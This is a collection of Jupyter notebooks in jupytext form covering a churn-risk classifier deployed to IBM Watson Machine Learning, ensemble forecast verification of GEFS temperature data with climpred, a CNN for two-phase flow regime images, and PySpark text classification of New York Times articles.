# These four numbers are the building blocks for most classifier evaluation metrics. A fundamental point when considering classifier evaluation is that pure accuracy (i.e. was the prediction correct or incorrect) is not generally a good metric. The reason for this is because a dataset may be highly unbalanced. For example, if a model is designed to predict fraud from a dataset where 95% of the data points are not fraud and 5% of the data points are fraud, then a naive classifier that predicts not fraud, regardless of input, will be 95% accurate. For this reason, metrics like precision and recall are typically used because they take into account the type of error. In most applications there is some desired balance between precision and recall, which can be captured by combining the two into a single metric, called the F-measure.
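The metrics described above follow directly from the four counts; a minimal per-class sketch (`sklearn.metrics.classification_report`, used below, reports the same quantities for each label):

```python
def precision_recall_f1(tp, fp, fn):
    """Precision, recall and F-measure from confusion-matrix counts."""
    precision = tp / (tp + fp)  # of everything predicted positive, how much was right
    recall = tp / (tp + fn)     # of everything actually positive, how much was found
    f1 = 2 * precision * recall / (precision + recall)  # harmonic mean of the two
    return precision, recall, f1

# Example counts (illustrative only): 8 true positives, 2 false positives, 4 false negatives
p, r, f = precision_recall_f1(tp=8, fp=2, fn=4)
print(p, r, f)  # 0.8, 0.666..., 0.727...
```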
# display label mapping to assist with interpretation of the model results
label_mapping=le.inverse_transform([0,1,2])
print('0: ', label_mapping[0])
print('1: ', label_mapping[1])
print('2: ', label_mapping[2])
# +
### test your predictions using sklearn.classification_report()
report = sklearn.metrics.classification_report( y_test, y_prediction )
### and print the report
print(report)
# -
print('Accuracy: ',sklearn.metrics.accuracy_score( y_test, y_prediction ))
# #### Get the column names of the transformed features
m_step=pipeline.named_steps['mapper']
m_step.transformed_names_
features = m_step.transformed_names_
# Get the features importance
importances = pipeline.named_steps['RandonForestClassifier'].feature_importances_  # importances of the whole forest, not a single tree
indices = np.argsort(importances)
plt.figure(1)
plt.title('Feature Importances')
plt.barh(range(len(indices)), importances[indices], color='b',align='center')
plt.yticks(range(len(indices)), (np.array(features))[indices])
plt.xlabel('Relative Importance')
# <a id="save_model"></a>
# ## 5. Save the model into WML Deployment Space
# [Top](#top)
# Before we save the model we must create a deployment space. Watson Machine Learning provides deployment spaces where the user can save, configure and deploy their models. We can save models, functions and data assets in this space.
#
# The steps involved for saving and deploying the model are as follows:
#
# 1. Lookup the pre-created deployment space.
# 2. Set this deployment space as the default space.
# 3. Store the model pipeline in the deployment space. Enter the name for the model in the cell below.
# 4. Deploy the saved model. Enter the deployment name in the cell below.
# 5. Retrieve the scoring endpoint to score the model with a payload
#
# We use the ibm_watson_machine_learning library to complete these steps.
# +
# #!pip install ibm-watson-machine-learning==1.0.14
# #!pip uninstall -y ibm-watson-machine-learning
# #!pip install --no-cache-dir ibm-watson-machine-learning==1.0.14
# +
# Specify names for the space being created, the saved model and the model deployment
space_name = 'churnrisk_deployment_space'
model_name = 'churnrisk_model_nb'
deployment_name = 'churnrisk_model_deployment'
# +
from ibm_watson_machine_learning import APIClient
# create the WML credentials with the apikey
wml_credentials = {
"url": "https://us-south.ml.cloud.ibm.com",
"apikey":"INSERT YOUR APIKEY HERE"
}
client = APIClient(wml_credentials)
# -
# ### 5.1 Lookup Deployment Space
for space in client.spaces.get_details()['resources']:
if space_name in space['entity']['name']:
space_id = space['metadata']['id']
print(space_id)
client.set.default_space(space_id)
# ### 5.2 Store the model in the deployment space
# list all supported software specs
client.software_specifications.list()
# run this line if you do not know the version of scikit-learn that was used to build the model
# !pip show scikit-learn
#software_spec_uid = client.software_specifications.get_uid_by_name('scikit-learn_0.22-py3.6')
software_spec_uid = client.software_specifications.get_uid_by_name('scikit-learn_0.20-py3.6')
# +
metadata = {
client.repository.ModelMetaNames.NAME: model_name,
client.repository.ModelMetaNames.SOFTWARE_SPEC_UID: software_spec_uid,
client.repository.ModelMetaNames.TYPE: "scikit-learn_0.20"
}
stored_model_details = client.repository.store_model(pipeline,
meta_props=metadata,
training_data=X_train,
training_target=y_train)
# -
stored_model_details
# ### 5.3 Create a deployment for the stored model
# +
# deploy the model
meta_props = {
client.deployments.ConfigurationMetaNames.NAME: deployment_name,
client.deployments.ConfigurationMetaNames.ONLINE: {}
}
# deploy the model
model_uid = stored_model_details["metadata"]["id"]
deployment_details = client.deployments.create( artifact_uid=model_uid, meta_props=meta_props)
# -
# ### 5.4 Score the model
# +
# retrieve the scoring endpoint
scoring_endpoint = client.deployments.get_scoring_href(deployment_details)
print('Scoring Endpoint: ',scoring_endpoint)
# -
scoring_deployment_id = client.deployments.get_uid(deployment_details)
client.deployments.get_details(scoring_deployment_id)
payload = [{"values": [ ['Young adult','M','S', 2,56000, 'N', 5030, 23, 2257, 125, 3.45, 2, 19, 1200, 251]]}]
payload_metadata = {client.deployments.ScoringMetaNames.INPUT_DATA: payload}
# score
predictions = client.deployments.score(scoring_deployment_id, payload_metadata)
predictions
# display label mapping to assist with interpretation of the model results
label_mapping=le.inverse_transform([0,1,2])
print('0: ', label_mapping[0])
print('1: ', label_mapping[1])
print('2: ', label_mapping[2])
# ### Useful Helper Functions
# #### Create download links for the test data .csv files for batch scoring and model evaluations
# +
# Define functions to download as CSV or Excel
from IPython.display import HTML
import pandas as pd
import base64, io
# Download as CSV: data frame, optional title and filename
def create_download_link_csv(df, title = "Download CSV file", filename = "data.csv"):
# generate in-memory CSV, then base64-encode it
csv = df.to_csv(index=False)
b64 = base64.b64encode(csv.encode())
payload = b64.decode()
    html = '<a download="{filename}" href="data:text/csv;base64,{payload}" target="_blank">{title}</a>'
    html = html.format(payload=payload, title=title, filename=filename)
return HTML(html)
# -
# Write the test data to a .csv so that we can later use it for batch scoring
create_download_link_csv(X_test,"Download my data","churn_risk_model_batch_score.csv")
# Write the test data to a .csv so that we can later use it for evaluation
create_download_link_csv(X_test,"Download my data","model_eval.csv")
# #### Save and restore the model using the joblib package
# Save the pipeline with joblib
# !pip install joblib
import joblib
filename = 'churnrisk_model.sav'
joblib.dump(pipeline, filename)
# ! ls -lrt
# Use joblib to restore the model and score it with the test data
filename = 'churnrisk_model.sav'
loaded_model = joblib.load(filename)
result = loaded_model.score(X_test, y_test)
print(result)
# #### Save and restore the model using the pickle package
# Save the pipeline with pickle
import pickle
filename = 'churnrisk_model.pkl'
pickle.dump(pipeline, open(filename, 'wb'))
# !ls -lrt
# Use pickle to restore the model and score it with the test data
filename = 'churnrisk_model.pkl'
loaded_model = pickle.load(open(filename, 'rb'))
result = loaded_model.score(X_test, y_test)
print(result)
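# Both joblib and pickle serialize the object by value, so the restored object is an equivalent copy of the original. A stdlib-only sketch of the pickle round-trip, with a plain dict standing in for the fitted pipeline:

```python
import pickle

# A plain dict stands in here for the fitted pipeline object.
model_stub = {"name": "churnrisk_model", "classes": [0, 1, 2]}

blob = pickle.dumps(model_stub)     # serialize to bytes (dump writes to a file)
restored = pickle.loads(blob)       # deserialize (load reads from a file)

assert restored == model_stub       # equal by value
assert restored is not model_stub   # but a distinct copy
```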
# #### Use the project_lib package to save the model to the project data assets where it can be downloaded
from project_lib import Project
# project id from project url
# the id can be taken from the project url shown in the browser,
# For example, the project id is 28f40464-f07e-43c4-94a0-f6100744bd3d in this notebook URL
# https://dataplatform.cloud.ibm.com/analytics/notebooks/v2/3fed0ab0-2abe-4ff1-8aee-26481557e7c3?projectid=28f40464-f07e-43c4-94a0-f6100744bd3d&context=cpdaas
project_id = 'YOUR PROJECT ID'
# Get the value of access token created earlier in the Project Settings
access_token = 'YOUR ACCESS TOKEN'
project = Project(None, project_id, access_token)
# print project details of interest
pc = project.project_context
print('Project Name: {0}'.format(project.get_name()))
print('Project Description: {0}'.format(project.get_description()))
print('Project Bucket Name: {0}'.format(project.get_project_bucket_name()))
print('Project Assets (Connections): {0}'.format(project.get_assets(asset_type='connection')))
# Save the models to object storage
project.save_data(data=pickle.dumps(pipeline),file_name='churn_risk.pkl',overwrite=True)
# **Last updated:** 10/11/2020 - Original Notebook by <NAME>, updated in later versions by <NAME>. Final edits by <NAME> and <NAME> - IBM. Updated for the Virtual TechU Oct 2020 by <NAME>.
# Source: TradingCustomerChurnClassifier.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# #!conda install intake fsspec intake-xarray intake-thredds -c conda-forge -y
# +
# #!conda install eccodes cfgrib -c conda-forge -y
# +
# #!pip install climetlab --quiet
# -
# linting
# %load_ext nb_black
# %load_ext lab_black
# # Calculate skill for NWP model GEFS for 6-hourly global forecasts
# +
import intake
import fsspec # caching downloads
# specify caching location, where to store files to with their original names
fsspec.config.conf["simplecache"] = {
"cache_storage": "../my_caching_folder",
"same_names": True,
}
import intake_xarray # access files hosted via THREDDS
import climetlab # download ERA5
import xarray as xr
import numpy as np
import climpred # forecast verification
# -
# ## Find the data
# GEFS output can be found on a `THREDDS` server: https://www.ncei.noaa.gov/thredds/catalog/model-gefs-003/202008/20200831/catalog.html
#
# Here, we use `intake-thredds` to access the THREDDS catalog, `intake-xarray` to access the files and cache them with `fsspec`. However, you can also download the files manually, e.g. with `wget`:
#
# - https://intake.readthedocs.io/en/latest/
# - https://intake-xarray.readthedocs.io/en/latest/
# - https://intake-thredds.readthedocs.io/en/latest/
# - https://filesystem-spec.readthedocs.io/en/latest/
# all the metadata about GEFS
cat = intake.open_thredds_cat(
"https://www.ncei.noaa.gov/thredds/catalog/model-gefs-003/202008/20200831/catalog.html"
)
# cat
# Opening without `backend_kwargs` raises a `DatasetBuildError`: for `grib` files we need to select a single variable via `filter_by_keys`.
#
# DatasetBuildError: multiple values for unique key, try re-open the file with one of:
#
# - filter_by_keys={'typeOfLevel': 'isobaricInhPa'}
# - filter_by_keys={'typeOfLevel': 'surface'}
# - filter_by_keys={'typeOfLevel': 'depthBelowLandLayer'}
# - filter_by_keys={'typeOfLevel': 'heightAboveGround'}
# - filter_by_keys={'typeOfLevel': 'atmosphereSingleLayer'}
# - filter_by_keys={'typeOfLevel': 'atmosphere'}
# - filter_by_keys={'typeOfLevel': 'nominalTop'}
# - filter_by_keys={'typeOfLevel': 'pressureFromGroundLayer'}
# - filter_by_keys={'typeOfLevel': 'meanSea'}
# how to open grib files: https://github.com/ecmwf/cfgrib/issues/170
intake_xarray.NetCDFSource(
"simplecache::https://www.ncei.noaa.gov/thredds/fileServer/model-gefs-003/202008/20200831/gens-a_3_20200831_1800_000_20.grb2",
xarray_kwargs=dict(
engine="cfgrib",
backend_kwargs=dict(
filter_by_keys={"typeOfLevel": "heightAboveGround", "shortName": "2t"}
),
),
).to_dask().coords
# ## Get forecasts
inits_time = "0000" # get forecasts started at 00:00
inits = ["20200829", "20200830", "20200831"]  # three initial dates
members = range(5) # 5 members out of 20
leads = np.arange(0, 6 * 4 * 2 + 1, 6)  # 6-hourly leads: nine leads, up to 48 h
for init in inits:
for lead in leads:
for member in members:
try:
url = f'https://www.ncei.noaa.gov/thredds/fileServer/model-gefs-003/202008/{init}/gens-a_3_{init}_{inits_time}_{str(lead).zfill(3)}_{str(member).zfill(2)}.grb2'
#print(f'download init = {init}, lead = {lead}, member = {member}')
intake_xarray.NetCDFSource(f'simplecache::{url}',
xarray_kwargs=dict(engine='cfgrib', backend_kwargs=dict(filter_by_keys={'typeOfLevel': 'heightAboveGround', 'shortName':'2t'})),
).to_dask()
except Exception as e:
print('failed', type(e).__name__, e)
init = xr.concat(
[xr.concat(
[xr.open_mfdataset(f'../my_caching_folder/gens-a_3_{init}_{inits_time}_{str(lead).zfill(3)}_*.grb2',
concat_dim='member', combine='nested',
engine='cfgrib', backend_kwargs=dict(filter_by_keys={'typeOfLevel': 'heightAboveGround', 'shortName': '2t'}))
for lead in leads],
dim='step') for init in inits],
dim='time')
# save time when reproducing
init = init.compute()
init.to_netcdf('tmp_GEFS_a.nc')
init = xr.open_dataset("tmp_GEFS_a.nc")
# rename to climpred dims
init = init.rename({'step':'lead','number':'member','time':'init'})
# set climpred lead units
init["lead"] = np.arange(0, 6 * init.lead.size, 6)
init.lead.attrs["units"] = "hours"
# ## Get observations
#
# `climetlab` wraps `cdsapi` to download from the Copernicus Climate Data Store (CDS):
#
# - https://cds.climate.copernicus.eu/cdsapp#!/home
# - https://climetlab.readthedocs.io/en/latest/
# - https://github.com/ecmwf/cdsapi/
obs = climetlab.load_source(
"cds",
"reanalysis-era5-single-levels",
product_type="reanalysis",
time=["00:00", "06:00", "12:00", "18:00"],
grid=[1.0, 1.0],
param="2t",
date=[
"2020-08-29",
"2020-08-30",
"2020-08-31",
"2020-09-01",
"2020-09-02",
"2020-09-03",
],
).to_xarray()
# +
# climetlab or cds enable logging.INFO
import logging
logger = logging.getLogger()
logger.setLevel(logging.ERROR)
# -
# observations should only have a time dimension; drop the number/member, step/lead and valid_time coordinates
obs = obs.drop(["number", "step", "surface", "valid_time"])
# ## Forecast skill verification with `climpred.HindcastEnsemble`
alignment = "same_inits"
hindcast = climpred.HindcastEnsemble(init.drop("valid_time")).add_observations(obs)
# +
# still experimental, help appreciated https://github.com/pangeo-data/climpred/issues/605
# with climpred.set_options(seasonality='month'):
# hindcast = hindcast.remove_bias(alignment=alignment, cross_validate=False, how='mean')
# +
skill = hindcast.isel(lead=range(1, 9)).verify(
metric="crps", comparison="m2o", alignment=alignment, dim=["init", "member"]
)
skill.t2m.plot(col="lead", col_wrap=4, robust=True)
# -
# zooming into north america
skill.sel(longitude=slice(200, 320), latitude=slice(70, 15)).t2m.plot(
col="lead", col_wrap=4, robust=True, aspect=2.5
)
# Source: docs/source/examples/NWP/NWP_GEFS_6h_forecasts.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.8.10 64-bit (''.venv'': pipenv)'
# language: python
# name: python3
# ---
# # ML model to recognize two-phase flow regimes
# ## Import modules
# +
# Import modules
# ------------------------------------------------------------------------------ #
# Built-in modules
import os
# os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import glob
import random
# Third-party modules
import numpy as np
import pandas as pd
import tensorflow as tf
import matplotlib.pyplot as plt
# ------------------------------------------------------------------------------ #
# -
# ## Image data generator
# +
# Input data
# ------------------------------------------------------------------------------ #
n_img = 1000 # number of images to take from each run
# Labels
# 1 - Plug Flow; 2 - Transition Flow; 3 - Slug Flow
# Initialize lists
training_imgs = []
training_labels = []
# ------------------------------------------------------------------------------ #
# Data from Slug-Frequency campaign
# ------------------------------------------------------------------------------ #
IJMF_dir = '/media/psassi/URV/Paolo/URV/data/FastCam/3_Freq/Velocity/2P'
IJMF_regimes = [2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]
#
dir_contents = os.listdir(IJMF_dir)
dir_contents.sort()
two_phase_runs = []
for run in dir_contents:
if '2P' in run:
two_phase_runs.append(os.path.join(IJMF_dir,run))
two_phase_runs.sort()
#
for i, run in enumerate(two_phase_runs):
imgs_path = os.path.join(run, 'PPS_images', "*png")
files = glob.glob(imgs_path)
training_imgs.extend(random.sample(files,n_img))
training_labels.extend([str(IJMF_regimes[i])]*n_img)
# ------------------------------------------------------------------------------ #
# -
# ------------------------------------------------------------------------------ #
# Data from ECMF campaign
# ------------------------------------------------------------------------------ #
FTaC_dir = '/media/psassi/URV/Paolo/URV/data/FastCam/2_FTaC/Backlight/2P'
FTaC_regimes = [1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 3, 3, 2, 3, 3]
#
dir_contents = os.listdir(FTaC_dir)
dir_contents.sort()
FTaC_runs = []
for run in dir_contents:
if '2P' in run:
FTaC_runs.append(os.path.join(FTaC_dir,run))
FTaC_runs.sort()
#
for i, run in enumerate(FTaC_runs):
imgs_path = os.path.join(run, 'PNG_images', "*png")
files = glob.glob(imgs_path)
training_imgs.extend(random.sample(files,n_img))
training_labels.extend([str(FTaC_regimes[i])]*n_img)
# ------------------------------------------------------------------------------ #
# +
from sklearn.model_selection import train_test_split
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# Make pandas Data Frame
two_phase_pd = pd.DataFrame(
zip(training_imgs,training_labels), columns=['Files', 'Labels']
)
# Divide training and testing data frames
train_df, test_df = train_test_split(two_phase_pd, test_size=0.2)
# Make train generator
train_generator = ImageDataGenerator().flow_from_dataframe(
train_df,
x_col='Files',
y_col='Labels',
target_size=(512, 256),
color_mode='grayscale',
class_mode='sparse',
batch_size=64,
)
# Make test generator
test_generator = ImageDataGenerator().flow_from_dataframe(
test_df,
x_col='Files',
y_col='Labels',
target_size=(512, 256),
color_mode='grayscale',
class_mode='sparse',
batch_size=64,
)
# -
# ## Build the model
# +
model = tf.keras.models.Sequential([
    # Note the input shape is the desired image size: 512x256 with 1 color channel (grayscale)
tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(512, 256, 1)),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(32, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# Flatten the results to feed into a DNN
tf.keras.layers.Flatten(),
# 512 neuron hidden layer
tf.keras.layers.Dense(512, activation='relu'),
tf.keras.layers.Dense(3, activation='softmax')
])
model.summary()
# -
model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=1e-3),
loss='sparse_categorical_crossentropy',
metrics = ['accuracy'])
history = model.fit(
train_generator,
epochs=10,
validation_data=test_generator,
verbose=2
)
# +
#-----------------------------------------------------------
# Retrieve a list of list results on training and test data
# sets for each training epoch
#-----------------------------------------------------------
acc = history.history[ 'accuracy' ]
val_acc = history.history[ 'val_accuracy' ]
loss = history.history[ 'loss' ]
val_loss = history.history['val_loss' ]
epochs = range(len(acc)) # Get number of epochs
#------------------------------------------------
# Plot training and validation accuracy per epoch
#------------------------------------------------
plt.plot ( epochs, acc )
plt.plot ( epochs, val_acc )
plt.title ('Training and validation accuracy')
plt.figure()
#------------------------------------------------
# Plot training and validation loss per epoch
#------------------------------------------------
plt.plot ( epochs, loss )
plt.plot ( epochs, val_loss )
plt.title ('Training and validation loss' )
# -
model.save('./src/models/regime_identifier.h5')
# Source: test.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # TEXT CLASSIFICATION USING PYSPARK AND MLLIB
#
# ### Create DATA FRAME in PYSPARK
from pyspark import SparkContext
sc = SparkContext.getOrCreate()
# +
import os
#path = os.chdir('./')
from pyspark.sql import SQLContext
from pyspark import SparkContext
sc =SparkContext.getOrCreate()
sqlContext = SQLContext(sc)
# -
from pyspark.ml import Pipeline, PipelineModel
from pyspark.ml.classification import LogisticRegression
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pyspark.ml.feature import HashingTF, StopWordsRemover, IDF, Tokenizer
from pyspark.ml.tuning import ParamGridBuilder,CrossValidator
from pyspark.mllib.linalg import Vector
# ### Read Downloaded Data Files ; Create Learning DataSet
dirpath = 'data/NYT-articles/*'
NYTRawData = sc.wholeTextFiles(dirpath)
#print("The number of documents read in is " + str(NYTRawData.count()) + ".")
NYTRawData.count()
# ### Create UNKNOWN Dataset
dirpathUN = 'data/Validation set/*'
NYTRawDataUNKNOWN = sc.wholeTextFiles(dirpathUN)
#print("The number of documents read in is " + str(NYTRawDataUNKNOWN.count()) + ".")
NYTRawDataUNKNOWN.count()
# ### Display Sample Data from Learning Dataset
NYTRawData.takeSample(False,1, seed = 231279)
# ### Display Sample Data from UNKNOWN Dataset
NYTRawDataUNKNOWN.takeSample(False,1, seed = 231279)
filepath = NYTRawData.map(lambda x:x[0]).collect()
# #### Filter RDD to Capture Text
text = NYTRawData.map(lambda x:x[1]).collect()
textUN = NYTRawDataUNKNOWN.map(lambda x:x[1]).collect()
# #### Convert to DataFrame
# ##### Learning Dataframe = "df"
# ##### Unknown Dataframe =" dfUN"
# +
from pyspark.sql.types import Row
#here you are going to create a function
def f(x):
d = {}
for i in range(len(x)):
d[str(i)] = x[i]
return d
#Now populate that
df = NYTRawData.map(lambda x: Row(**f(x))).toDF()#.withColumn("Label",lit("Politics"))
dfUN = NYTRawDataUNKNOWN.map(lambda x: Row(**f(x))).toDF()
# -
df.columns
dfUN.columns
df.show(4)
# #### Prepare Learning Dataset for Modeling using Classification Models
# ###### Split Columns to get Category of each Article
from pyspark.sql.functions import split
split_col = split(df['0'], '/')
df = df.withColumn('NAME6', split_col.getItem(6))
df = df.withColumn('NAME7', split_col.getItem(7))
df.show()
df.printSchema()
drop_list = ['0', 'NAME6']#, 'DayOfWeek', 'PdDistrict', 'Resolution', 'Address', 'X', 'Y']
df = df.select([column for column in df.columns if column not in drop_list])
df.show(5)
df.printSchema()
# +
from pyspark.sql.functions import col
df = df.select(col("1").alias("Article"), col("NAME7").alias("Category"))
df.show()
# -
df.show(500)
# ##### Learning Data Set
#
# ##### (Collection of approx 589 articles in 4 categories from NYT)
from pyspark.sql.functions import col
df.groupBy("Category") \
.count() \
.orderBy(col("count").desc()) \
.show()
# #### Prepare UNKNOWN DataSet for Testing using CLASSIFICATION MODELS
# +
split_col = split(dfUN['0'], '/')
dfUN = dfUN.withColumn('NAME6', split_col.getItem(6))
dfUN = dfUN.withColumn('NAME7', split_col.getItem(7))
dfUN.printSchema()
drop_list = ['0', 'NAME6']#, 'DayOfWeek', 'PdDistrict', 'Resolution', 'Address', 'X', 'Y']
dfUN = dfUN.select([column for column in dfUN.columns if column not in drop_list])
#dfUN.show(5)
dfUN = dfUN.select(col("1").alias("Article"), col("NAME7").alias("Category"))
#dfUN.show()
from pyspark.sql.functions import col
dfUN.groupBy("Category") \
.count() \
.orderBy(col("count").desc()) \
.show()
# -
# + active=""
#
# -
# ### Divide Learning Data Set into Training and Test
# set seed for reproducibility
(trainingData, testData) = df.randomSplit([0.8, 0.2], seed = 231279)
print("Training Dataset Count: " + str(trainingData.count()))
print("Test Dataset Count: " + str(testData.count()))
trainingData.show()
testData.show()
# #### DISPLAY UNknown DF
dfUN.show()
# ## Classification Using Logistic Regression
# **LogisticRegression** is a method used to predict a categorical response. Spark ML's implementation supports both binomial and multinomial (multiclass) logistic regression, so it can handle our four article categories directly.
# ### Train the Learning Dataset (TRAIN And TEst)
# ### Build Pipeline using TF IDF
#
# In machine learning, it is common to run a sequence of algorithms to process and learn from data. Spark ML represents such a workflow as a Pipeline, which consists of a sequence of PipelineStages (Transformers and Estimators) run in a specific order. The pipeline in this example chains a tokenizer, StopWordsRemover, HashingTF, Inverse Document Frequency (IDF), and LogisticRegression.
#
# **Tokenizer** splits the raw text documents into words, adding a new column with words into the dataset.
#
# **StopWordsRemover** takes a sequence of strings as input and drops all stop words from it. Stop words are words that should be excluded from the input, typically because they appear frequently and don't carry much meaning. StopWordsRemover ships with a default list of stop words, and you can optionally supply your own; we will use the default list.
#
# **HashingTF** takes sets of terms and converts those sets into fixed-length feature vectors.
#
# **Inverse Document Frequency (IDF)** is a numerical measure of how much information a term provides. If a term appears very often across the corpus, it means it doesn’t carry special information about a particular document. IDF down-weights terms which appear frequently in a corpus.
#
#
#
# ###### Our model will make predictions and score on the test set; we then look at the top 10 predictions ordered by descending probability.
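# Before wiring the Spark pipeline together, here is a tiny pure-Python sketch of the two central ideas above — the hashing trick behind HashingTF and the IDF down-weighting. The toy hash function here is an illustrative assumption (Spark uses MurmurHash3 internally), but the IDF smoothing matches Spark MLlib's log((N + 1) / (df + 1)).

```python
import math

def hash_tf(words, num_features=16):
    """Hashing trick: bucket term counts into a fixed-length vector."""
    vec = [0] * num_features
    for w in words:
        vec[sum(ord(c) for c in w) % num_features] += 1  # toy deterministic hash
    return vec

def idf(docs):
    """IDF with the smoothing Spark MLlib uses: log((N + 1) / (df + 1))."""
    n = len(docs)
    df = {}
    for doc in docs:
        for w in set(doc):
            df[w] = df.get(w, 0) + 1
    return {w: math.log((n + 1) / (d + 1)) for w, d in df.items()}

docs = [["spark", "ml", "pipeline"], ["spark", "nlp"], ["spark", "ml"]]
weights = idf(docs)
# "spark" appears in every document, so it carries the least information
assert weights["spark"] < weights["nlp"]
assert len(hash_tf(docs[0])) == 16
```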
from pyspark.ml.feature import RegexTokenizer
regexTokenizer = RegexTokenizer(inputCol="Article", outputCol="words", pattern="\\W")
remover = StopWordsRemover(inputCol="words", outputCol="filtered")
add_stopwords = ["http","https","amp","rt","t","c","the"]
stopwordsRemover = StopWordsRemover(inputCol="words", outputCol="filtered").setStopWords(add_stopwords)
hashingTF = HashingTF(inputCol="filtered", outputCol="rawFeatures", numFeatures=10000)
idf = IDF(inputCol="rawFeatures", outputCol="features", minDocFreq=5)
lr = LogisticRegression(maxIter=20, regParam=0.3, elasticNetParam=0)
from pyspark.ml.feature import OneHotEncoder, StringIndexer, VectorAssembler
label_stringIdx = StringIndexer(inputCol = "Category", outputCol = "label")
# ### Define Learning Model
pipeline = Pipeline(stages=[regexTokenizer, remover, hashingTF, idf, label_stringIdx, lr])
model = pipeline.fit(trainingData)
# ### Train the Model using Logistic Regression
lrdata = model.transform(trainingData).select("words","features","label","probability","prediction").show()
# ### Perform Prediction on TEST Data
predictions = model.transform(testData)
predictions.filter(predictions['prediction'] == 1) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
# ## Accuracy on Test data using Logistic Regression
# #### Keep in mind that the model has not seen the documents in the test data set.
from pyspark.ml.evaluation import MulticlassClassificationEvaluator
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# ## Accuracy of UNKNOWN Data using Logistic Regression
# #### Keep in mind that the model has not seen the documents in the Unknown data set.
predictions = model.transform(dfUN)
predictions.filter(predictions['prediction'] == 1) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
from pyspark.ml.evaluation import MulticlassClassificationEvaluator
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# ## CLASSIFICATION USING "NAIVE BAYES"
# ### RANDOM SPLIT DATA AGAIN
# ### DEFINE PIPELINE
# ### TRAIN MODEL
# +
from pyspark.ml.classification import NaiveBayes
(trainingData2, testData2) = df.randomSplit([0.8, 0.2], seed = 231279)
nb = NaiveBayes(smoothing=1)
pipelinenb = Pipeline(stages=[regexTokenizer, remover, hashingTF, idf, label_stringIdx, nb])
model = pipelinenb.fit(trainingData2)
# -
nbdata = model.transform(trainingData2).select("words","features","label","probability","prediction").show()
# ### Perform Prediction of TEst Data using Model Trained on "Naive Bayes"
predictions = model.transform(testData2)
predictions.filter(predictions['prediction'] == 0) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
# ## Accuracy of Test data Using "Naive Bayes"
# #### Keep in mind that the model has not seen the documents in the test data set.
evaluatornb = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluatornb.evaluate(predictions)
# ## Accuracy of UNKNOWN data Using "Naive Bayes"
# #### Keep in mind that the model has not seen the documents in the Unknown data set.
predictions = model.transform(dfUN)
predictions.filter(predictions['prediction'] == 0) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
evaluatornb = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluatornb.evaluate(predictions)
# ## Calculate ACCURACY using Cross Validation on Logistic Regression
# Spark MLlib provides for cross-validation for hyperparameter tuning. Cross-validation attempts to fit the underlying estimator with user-specified combinations of parameters, cross-evaluate the fitted models, and output the best one.
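# A stripped-down, stdlib-only sketch of what CrossValidator does under the hood — split the data into k folds, average a score per parameter value across folds, and keep the parameter with the best mean. The scoring function below is a toy stand-in, not a real estimator.

```python
def k_fold_indices(n, k):
    """Yield (train_idx, test_idx) pairs for k contiguous folds."""
    fold = n // k
    for i in range(k):
        test = list(range(i * fold, (i + 1) * fold if i < k - 1 else n))
        train = [j for j in range(n) if j not in test]
        yield train, test

def cross_validate(params, score_fn, n=20, k=5):
    """Return the parameter value with the best mean score across folds."""
    best_param, best_score = None, float("-inf")
    for p in params:
        scores = [score_fn(p, tr, te) for tr, te in k_fold_indices(n, k)]
        mean = sum(scores) / len(scores)
        if mean > best_score:
            best_param, best_score = p, mean
    return best_param

# Toy scorer: pretend regParam = 0.3 generalizes best.
toy_score = lambda p, tr, te: 1.0 - abs(p - 0.3)
assert cross_validate([0.1, 0.3, 0.5], toy_score) == 0.3
```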
# +
from pyspark.ml.tuning import ParamGridBuilder, CrossValidator
lr = LogisticRegression(maxIter=20, regParam=0.3, elasticNetParam=0)
#from pyspark.ml.tuning import ParamGridBuilder, CrossValidator
# Create ParamGrid for Cross Validation
paramGrid = (ParamGridBuilder()
.addGrid(lr.regParam, [0.1, 0.3, 0.5]) # regularization parameter
.addGrid(lr.elasticNetParam, [0.0, 0.1, 0.2]) # Elastic Net Parameter (Ridge = 0)
# .addGrid(model.maxIter, [10, 20, 50]) #Number of iterations
# .addGrid(idf.numFeatures, [10, 100, 1000]) # Number of features
.build())
# Create 5-fold CrossValidator
cv = CrossValidator(estimator=lr, \
estimatorParamMaps=paramGrid, \
evaluator=evaluator, \
numFolds=5)
pipelineCVLR = Pipeline(stages=[regexTokenizer, remover, hashingTF, idf, label_stringIdx,cv])
cvModel = pipelineCVLR.fit(trainingData)
predictions = cvModel.transform(testData)
# Evaluate best model
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# -
